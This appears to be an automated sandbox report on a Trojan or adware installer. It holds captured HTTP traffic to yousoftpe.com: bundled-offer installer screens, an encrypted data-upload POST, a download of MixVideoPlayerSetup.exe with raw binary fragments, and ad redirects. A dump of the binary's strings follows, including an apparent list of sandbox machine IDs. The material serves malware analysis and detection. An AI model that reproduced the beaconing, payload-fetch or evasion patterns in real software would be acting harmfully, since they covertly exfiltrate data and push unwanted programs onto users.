Type/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" x
mpMM:InstanceID="xmp.iid:C7B15D6E6C0511E4901AB7B77D879212" xmpMM:Docum
entID="xmp.did:C7B15D6F6C0511E4901AB7B77D879212"> <xmpMM:Derived
From stRef:instanceID="xmp.iid:C7B15D6C6C0511E4901AB7B77D879212" stRef
:documentID="xmp.did:C7B15D6D6C0511E4901AB7B77D879212"/> </rdf:D
escription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r
"?>................................................................
..................................................................~}|{
zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;
:9876543210/.-, *)('&%$#"! .................................!.....
<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loadingBar.gif HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:00 GMT

Content-Type: image/gif

Content-Length: 77170

Last-Modified: Fri, 27 Feb 2015 14:07:01 GMT

Connection: keep-alive

ETag: "54f07a05-12d72"

Accept-Ranges: bytes
GIF89a|..............................c........"..y..4.....H.....i.....
/..1..2.....M.....W...........v...........-..u........0..1.. ..... ...
.....*.....!.....*.....,..{........z..s.....5........&.."..(..(..,..2.
.4..8..).. ..u..... ..$.....z..m...........*......../..*.....,........
...4..".....%..'.. ..............%........(../..............!.........
.....8.....&..3.....)..... ../........%..4.....!..NETSCAPE2.0.....!..X
MP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http:
//ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/s
Type/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" x
mpMM:InstanceID="xmp.iid:C7B15D6A6C0511E4901AB7B77D879212" xmpMM:Docum
entID="xmp.did:C7B15D6B6C0511E4901AB7B77D879212"> <xmpMM:Derived
From stRef:instanceID="xmp.iid:C7B15D686C0511E4901AB7B77D879212" stRef
:documentID="xmp.did:C7B15D696C0511E4901AB7B77D879212"/> </rdf:D
escription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r
"?>................................................................
..................................................................~}|{
zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;
:9876543210/.-, *)('&%$#"! .................................!.....
<<< skipped >>>

GET /__maxpower__/render_screen/2014/11/a888aa68-73d0-11e4-b71d-06a3579b0dab/screen_variation=videoUpdater HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:09 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 814

Connection: keep-alive

Vary: Accept-Language

Content-Language: en

Accept-Ranges: bytes
.<!--finish Videoupdater-->....<div class="finish">..<h
1>........Setup Wizard.......</h1>..<p style="margin-top: 
15px; font-size: 13px;">You have succesfully installed the software
 below and they are ready to be used:</p>....<div class="item
s">...<ul>....<li class="check">%mapp%</li>......
</ul>..</div>....<div class="clear"></div>....
<p>Recommended offers:</p>......<div class="list-toolba
rs" id="alloffers">....<ul class="_FinishOffers">....</ul&
gt;...</div>....<!--...<div class="banner">......<if
rame src="hXXp://n149adserv.com/ads?key=09879bcf6e631312a2c4d02d9cae27
2f&width=300&height=250" frameborder='0' scrolling='no' width='300' he
ight='250'></iframe>...</div> ..-->.........<inpu
t id="_Bexit" class="_Bexit close absol" tabindex="2" type="submit" na
me="nombre" onclick='onExit()' value="Close">....</div>..nt>....

GET /maxpower-static/apps/34/68794/css/style.css HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:25:59 GMT

Content-Type: text/css

Content-Length: 114

Last-Modified: Mon, 16 Mar 2015 11:21:34 GMT

Connection: keep-alive

ETag: "5506bcbe-72"

Accept-Ranges: bytes
/* mapp MixVideoPlayer */....welcome ul  {...width:210px;..float: left
; ..}...welcome ul li {..margin-top: 10px;.}HTTP/1.1 200 OK..Server: n
ginx..Date: Sat, 06 Jun 2015 00:25:59 GMT..Content-Type: text/css..Con
tent-Length: 114..Last-Modified: Mon, 16 Mar 2015 11:21:34 GMT..Connec
tion: keep-alive..ETag: "5506bcbe-72"..Accept-Ranges: bytes../* mapp M
ixVideoPlayer */....welcome ul  {...width:210px;..float: left; ..}...w
elcome ul li {..margin-top: 10px;.}....


GET /__maxpower__/render_screen/2014/11/8b9c3fb4-73d0-11e4-925e-06a3579b0dab/screen_variation=videoUpdater HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:00 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 961

Connection: keep-alive

Vary: Accept-Language

Content-Language: en

Accept-Ranges: bytes
..<!--Intall Videoupdater-->..<div class="install">..    &
lt;h1>Installation Progress</h1>.    .    <p>This Downl
oad Manager will minimize to your system tray shortly to allow you to 
work on other items while your selections install. To restore this win
dow, simply click on the icon in your system tray.</p>.    .    
  <div class="install-loading">.    </div>.    <div cla
ss="progress-bar">.        <div class="_TotalProgressLevel progr
ess-level" ></div>            .    </div>....<div cl
ass="clear" style="height:10px; display:block;"></div>.     &
lt;div class="_ProgressInstallingText" style="display:none; text-align
: center; margin-left: 45px; width: 422px;"><p>Installing ...
</p></div>.    .    <div class="_ProgressText" style="d
isplay:none;  margin-left: 33px;">.        <p>Process: <sp
an class="_ProgressTextDownloaded"></span>  of <span 
class="_ProgressTextTotal"></span> (<span class="_Progress
TextPercentage"></span> %)</p>.    </div>..   .  
 .</div>.....


GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/i-download.png HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:00 GMT

Content-Type: image/png

Content-Length: 1433

Last-Modified: Fri, 27 Feb 2015 14:06:57 GMT

Connection: keep-alive

ETag: "54f07a01-599"

Accept-Ranges: bytes
.PNG........IHDR...*...*.....J.^.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:24FEED836BEF11E4901AB7
B77D879212" xmpMM:DocumentID="xmp.did:24FEED846BEF11E4901AB7B77D879212
"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:24FEED816BEF11E4
901AB7B77D879212" stRef:documentID="xmp.did:24FEED826BEF11E4901AB7B77D
879212"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&
gt; <?xpacket end="r"?>lW1.....IDATx.b|[email protected]...#...k..
...!..T?.&..}_......{....`..?....{..z...'..a..C*....'V.....&VV"M...eWT
...{..X...b..\\.M.LHP.:..0.v..9..?.>.W.......ax....X...MM.........~
.xA.d....".nTT............/w..c,...!.....\T..;w.Z.......D.K......O....
G.......E..$X.D...9..../......K..$...JD.CF_............>.......Lc.f
.U.$.7.NqJK...".....|}.<|[email protected]..^.T.......d.....9
8.>..w RNK.*....C.._.<..q.....mX.)...?..D.l!.{<...7o......\..
......W.....^.|,?..v.;p.B..B..r..d.~B.........X%....b-<..c {9.Im.O.
.........Z?l...v\. ...F.0_B.5....IEND.B`.....
<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/progress-bar.png HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:00 GMT

Content-Type: image/png

Content-Length: 1392

Last-Modified: Fri, 27 Feb 2015 14:07:04 GMT

Connection: keep-alive

ETag: "54f07a08-570"

Accept-Ranges: bytes
.PNG........IHDR...|.........L.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:15582AE06BF411E4901AB7
B77D879212" xmpMM:DocumentID="xmp.did:15582AE16BF411E4901AB7B77D879212
"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:24FEED896BEF11E4
901AB7B77D879212" stRef:documentID="xmp.did:24FEED8A6BEF11E4901AB7B77D
879212"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&
gt; <?xpacket end="r"?>[email protected]~:52u.....,.g...e.
.<..l..F...|.E.....G....n..g......V..v.^.C..?... .........k..Bc.Y.V
....._....E.(...T.eR...`yn..i.{t...-{tB..{\5......y..s..4kyn<=\5.KV
:......u..l..QK.)z.n.........c......\....N.=EG..w..^.Xh......~....w...
>..S.dy.H.$5.@.^o..........t...5.N|...>....3..H.....(.3..`Ft....
......y..~8^...1OC..x....it&W@it..."..=^MV..WA.$.....W...D6.....v.y...
....Pis..2.W:..^..........-.lx>P......3$CR...}.<..5*......f,vl]c
.i...k...xN.|>o6......P......z..p8..cv.....o.....&..m.c....IEND.B`.
....
<<< skipped >>>

POST /88e3cdf5a5346baa2b731227e7a325392c7d17c057f36ec1aa728dd48813418e75a639a1f3c174651b0f651572207b831c51a60cc8716716 HTTP/1.1

User-Agent: dBrowser 2 CallGetResponse:2

Host: api.yousoftpe.com

Content-Length: 4006

Cache-Control: no-cache

cdata=86394263D6DED7AD3ED013DFEF7E64F6FD7F7EB6471F6E1008FAF67D6BFDB01B26EAAA801BC7C09F4151D3761C9F974F6921D434084F69EB0E2262EC981EFAF4B71B6DE53AB1621839F9301B469E85E3DEEA269604ED17849843D57DA5D052460EA403F0E2730A705291EE1BB655062579317F3835A3F1C8D611E8D59DE4E29330C729C3611175A91D6C4B2CA57BF51B8A93E962C0C6C7C6FD68E8538140D7179A18D7BCE232EF1C1C0A61A0FC128EFA35879CE800C42FE7ED6DD7260C2A734FD494B2C250259201C61772E42F1834C5441D06379FFA40F46894C31933E48BDA957A476C0D2DA52AB22D25163CA51C0265C33430C2CCDC2445DB733784FAF2387F2028217CF16B47693BE71A94A31D04FEC270C62AA77F5607A856310D3163700B9358E90F7D346FCC65CFCEB261A852FC730CFC5512A46C99D7521B0CEB0A7AB836EB90C4968390E70FBE66142A024A56DCD1FF2C37F69104A76D9C65E8C995026485C84E02B717CB69E1DEE79A5B7163A85418804D4732B853988DC447F077EDBE26ADDD2D6491B936C16D6FDA0CBE8C32A9E47A43291E06605D7327A003427FA57088F709FEA77EF306CA4BFEF54BDAEDF7E4F54FF66DB4CD09C36F722294E15B4466C6626B87D934840432CEAB2D0F2D5CD256D16454ADD9ACD51EA2376FD7ABDAC2DC20C1CE4FC529377AACD629FFED22A89B2F4422D24E82882AF7AA2C1A16BB81C3838A8D3EB3E18BBEF18D60DC1B234AC6A358521720470391E8CFDF41099A29F798B6EC70E827139413E513DA51D7708F4957B91AC64EBB6FD47BCACAF081BD0D876AEEB0C3A09A3ED5BA4F85EBBC8F97F88B9899F77E1B84AD58BCEBFBA8B236534DAF1C60FCFEF16CB364963AB371E91C1C08792FDC29952F850065D8D
HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:09 GMT

Content-Type: text/plain

Transfer-Encoding: chunked

Connection: keep-alive
7..MAXTHX...0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 06 Jun 2015 
00:26:09 GMT..Content-Type: text/plain..Transfer-Encoding: chunked..Co
nnection: keep-alive..7..MAXTHX...0......

GET /84/MixVideoPlayerSetup.exe HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: static.yousoftpe.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:04 GMT

Content-Type: application/octet-stream

Content-Length: 3789056

Connection: keep-alive

Last-Modified: Fri, 05 Jun 2015 11:17:43 GMT

ETag: "55718557-39d100"

Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...|...B...:............@..............
............0'[email protected]........@!
.@....................`...............................................
........................................text....s.......t.............
..... ..`.rdata... .......,...x..............@[email protected].... ...........
[email protected]...@..
..@!.....................@[email protected].....'[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>

GET /?s1=&s2=&s3= HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 3p6.popularfastchannel.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html

Date: Sat, 06 Jun 2015 00:26:06 GMT

Location: hXXp://ASMzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68

Server: nginx/1.2.8

X-Powered-By: PHP/5.3.23

Content-Length: 0

Connection: keep-alive
HTTP/1.1 302 Moved Temporarily..Content-Type: text/html..Date: Sat, 06
 Jun 2015 00:26:06 GMT..Location: hXXp://ASMzz.exclusiverewards.startr
ee.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XN
SX.-r10845-t68..Server: nginx/1.2.8..X-Powered-By: PHP/5.3.23..Content
-Length: 0..Connection: keep-alive..

The Trojan connects to the servers at the folowing location(s):

`.rsrc

J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ<=JJJJJJJJJJJ>?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI

j.hTwV

j.hHzV

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlexcept.h

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xdebug

FJN[[[[[_mx$.6>ACINSU]etuv",,:EP_cjs{|*./;DLV_gjy{ -3>>DP^kp FDKWany

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\streambuf

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocnum

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xlocale

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xiosbase

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\cstringt.h

EQW]]]]]ett{'*02?CCRTam||%-9::HQT]alq"(-1??JSU^ekyy"#$$.=JYgkpt|}#')1=KZ[]]^ksy')6?AGN]`nox'.05=AP^fq{}--68ETW]cqv|}$,79GP]lov'(--;EMVYaly#&'4@FGS\eooq *-03AJQ\]]hllz'

GHIIIIIIKSbqvw(.46BCHPTUXYfr{LKOQ]huw|

BQS`````ln|&-7;DMO[ddrtv'5CGGLTWfu!#' 3<<KZbo{{FRWYamx&2?M\ffoz$(6CGP

IT[_____gvCN]ffqv%,7@LNSW]an|*AMSVXbp{!#034<ACLVXdkr .1=@OT`cky')),

GMQ\\\\\defghno{(-6CRaeix}"&-;EMT`ky|'-1

LX^hhhhhmuxz"$/>HJQVV[\dqx#' 8GHQ]ju%% 9:>?KNVeop| '(39>@ITcpx$%*67CGGUW

N\cmmmmmp{{} 0?CDGMXaht (.<=?ILWZiwyz$/49;DHKMSWdsy(56DGS`mv!LR^eghkxy

NX]fffffjkxzCJXamny|".3:GUbkm| -59ESW

CHKQQQQQVao|#-;IT]iip|)0=DQTZbiiov}ICF

GHIIIIIIKW`oxx %89COO^eenop{$*08FLOPUa

()$^.* ?[]|\-{},:=!

GMQ\\\\\]ijkqqu!)-448AAFHUWZant}.69GMU_fnnwz',,6>?NRajy!/4:FOOT]^apvy"&0

invalid _N_type: %d

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\locale

CHKQQQQQ[dps##%'*./25@JSYekrz>BNZblr! 3?HKZ]hp|)4BPTcrt '5;JJY[iijjx)19FUaoo|*.28;;COXgv%,.<AMOXcdivv

AIP[[[[[^hmns "" 0=>LZiqt!07BGQ[gt"$' 57BEFLXfn|-<DMY`hnv *1;GQYer#;FRY[chlnr{}#.:=FJY]lx)*3AEHW]lt#.<FLRT[_fqt"1>LY^aijw"LKT\^divz'58DLYYY\\_nvz&,9GOPYhkx)15@FST__nu$019>KXguz!#'0456:FS`cr{)888FKR[_mu %,:;JNSVaahhvw!,4>>AAIP\`cklquz!% 2ALST\cqx{ 5BFISSZemox')7<DIOSV^cipv}"08>BKX^_n{#&17?@KKKUdmmq}.7@EOTVZgjv|,6@BJPW\_bir".044<IQ_`hv&47<DNVckq|*038EFQ\

NSTTTTTT_ghhs$1@KN[^dr{)-:IU\kuuw%,49ADGHS_ahqwx$.69FKN]bkz| 1;DEQT\jx$%-1=BGLWcp|-9EIX\ktz"#-8?IP\`bfjmmt (/:EQ]dkns})2>FO^eglqz|"(4:FTU[inpy|#014?@MZhrs"(2:DMZgghpz}&/48=CCOXbo (-02:>HWeq{*-<FKUU[cqx"&'28<EKR_cko{$$:;;?KTcpty"*37;;=DEIT`blw{#0>BFKQZ[hrwx| 0;E

IsWindowsServer

CHKQQQQQZcgmmmmt!),2=FMOZfq}#()3>>>HINXgmw %*7CMZ`kw CELPYcosy),1=HJX`hu&2@@MY]agjjr )8GT[]kp| )45:GG

GHIIIIIIJMX__loruz{&,01@CRT[cpyy!,;;DOP]cmmx'''0>BJXgv%(23@NQW[[`hox'.22

LX^hhhhhou'FGQQYcfhs#&19<BFJVakq %,2@G

GetExternal.cpp

AIP[[[[[abgqrs#(.9GNV[^ggjltx%'456<>CKVWX^hot#)39CFFRTcp $,:GIMNRU]iruuy

GHIIIIIIMVXgu%2<>EFIUdpy)5@JMSS[ioo|$2>K

GHIIIIIIWdlty678CNY\``ehu$3:EM[^ls|%/7:IR`nvv'(,9;DQVelw?EEQSVboy'-2:@OSX]er!#08DPTWakv|(07:HQSVcr

AIP[[[[[abbly"0:GVZ]diw'69GLYZ\dm|'/<=ADP]ggjryz#,9:AIX]_hq (*6?BBGPU_jmn}& 4=DSS\crt!",,,377;DEJKWbiw{"

DSSbbbbbm{!.066;JXbcrt%4:IKNWao{$3?L[[^_

helpJavaScript.cpp

BQS`````cr!(-68GRVWetux ,-9>BCCRT^dmw&5CCMNVajx'5<@EFTZ[fo|,,27<?HST`efqv!(-19EIJV`mxx%&(/3;AEO]fs|(7<BP

GHIIIIIIX_`mmtw! --8BCKUVVep}'6;>GLNT^`dfhtv$ ./49ENYdeory555:IWfss %,

NetBase.cpp

GMQ\\\\\ems#179=?IWbijt} .:APPRTWWes .9FQWeho}$6DO]gkuwz!>BIUYfu#&118AHT\krrz{* .4<DNZ`krx}!!&09DLZ

ERV]]]]]bffo{'./23BLOP[ao{{*66@DMNZeft(DFT__ilxx"),06ABCMZ`cgsz|'/0=HS[emp!!"#$(,59;DJMYdejn{(-4ALUdpzz|$'*9<BDHUciily).7:GQZacfhptw!&./;HWfly)/0<GGS[dhnwx'1?MN[`ffsy

NX]fffffkww".5>MXanooqx!'/8@NP_kx))7?DRacqy!!/0>BESW\^djmx!%*6@KTbbqz$28AFLPSXcrt4=LMVX]hu{,5@BHQ\dls

PictureEx.cpp

c:\logFile.txt

Error opening key.

Key not found.

CheckRegistryKeyExistance

SetStringKey

"exeId":"

inflate 1.1.3 Copyright 1995-1998 Mark Adler

1.1.3

CWebBrowser2

mb_00000000-0000-0000-0807-060504030201

mb_09F005AE-AC9D-4FC1-AB7A-24004F6C043A

mb_01010101-0101-0101-0101-010101010101

mb_58585858-5858-5858-5858-585858585858

mb_4c4c4544-0000-2010-8020-80c04f202020

mb_11111111-2222-3333-4444-555555555555

mb_11111111-1111-1111-1111-111111111111

mb_00020003-0004-0005-0006-000700080009

mb_890E2D14-CACD-45D1-AE66-BC80E8BFEB0F

mb_8E275844-178F-44A8-ACEB-A7D7E5178C63

mb_52309712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_DC698397-FA54-4CF2-82C8-B1B5307A6A7F

mb_61F39712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_50FB9712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_93309712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_56F49712-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_07090201-0103-0301-0807-060504030201

mb_03000200-0400-0500-0006-000700080009

mb_FEFEFEFE-FEFE-FEFE-FEFE-FEFEFEFEFEFE

mb_FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF

mb_00000000-0000-0000-0000-000000000000

0.0.0.0

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp

CNotSupportedException

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

m_msgCur = {

m_pszExeName =

m_nCmdShow =

m_lpCmdLine =

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

Warning: no message line prompt for ID 0xX.

Warning: OnUpdateKeyIndicator - unknown indicator 0xX.

Warning: scroll bars in frame windows may cause unusual behaviour.

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxpriv.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcoll.inl

CCmdTarget

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\cmdtarg.cpp

SENDING control notification %d from control id 0xX to %hs window.

SENDING command id 0xX to %hs target.

No handler for command ID 0xX, disabling it.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\thrdcore.cpp

m_nMsgLast =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui2.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui1.cpp

Error: failed to load message box prompt string 0xx.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp

Warning: unknown WM_MEASUREITEM for menu item 0xX.

hhctrl.ocx

Implementation Warning: control notification = $%X.

Warning: not executing disabled command %d

hWnd = $X (nIDC=$X) is not a %hs.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occdlg.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occsite.cpp

IOleInPlaceObject not supported on OLE control (dialog ID %d).

Persistence not supported on OLE control %ls.

%d. Column ordinal %d: Binding as native data type

%d. Column ordinal %d: Binding a COM object

%d. Column ordinal %d: Binding as an IStream object

%d. Column ordinal %d: Binding as an ISequentialStream object

neither ISequentialStream nor IStream are supported!

IStream is supported

FISequentialStream is supported

Testing streams support...

%d. Column ordinal %d: Binding by reference in provider allocated, consumer owned memory

%d. Column ordinal %d: Binding length and status ONLY

Number of columns: %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\atldbcli.h

Unsupported DBTYPE (%d) in column %d

$@Column %d not bound

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp

IGNORING command id 0xX sent to %hs dialog.

Routing command id 0xX to app.

Routing command id 0xX to owner window.

Warning: Creating dialog from within a COleControlModule application is not a supported scenario.

Warning: ExecuteDlgInit failed during dialog init.

ERROR: Dialog with IDD 0xX must have the child style.

ERROR: Dialog with IDD 0xX must be invisible.

ERROR: Cannot find dialog template with IDD 0xX.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occcont.cpp

Error: no data exchange control with ID 0xX.

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxole.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp

m_ps.rcPaint =

m_ps.fErase =

m_ps.hdc =

lgpn.lopnColor =

lgpn.lopnWidth.x (width) =

lgpn.lopnStyle =

lb.lbColor =

lb.lbHatch =

lb.lbStyle =

lf.lfFaceName =

lf.lfPitchAndFamily =

lf.lfQuality =

lf.lfClipPrecision =

lf.lfOutPrecision =

lf.lfCharSet =

lf.lfStrikeOut =

lf.lfUnderline =

lf.lfItalic =

lf.lfWeight =

lf.lfOrientation =

lf.lfEscapement =

lf.lfWidth =

lf.lfHeight =

bm.bmBitsPixel =

bm.bmPlanes =

bm.bmWidthBytes =

bm.bmWidth =

bm.bmHeight =

bm.bmType =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\elements.h

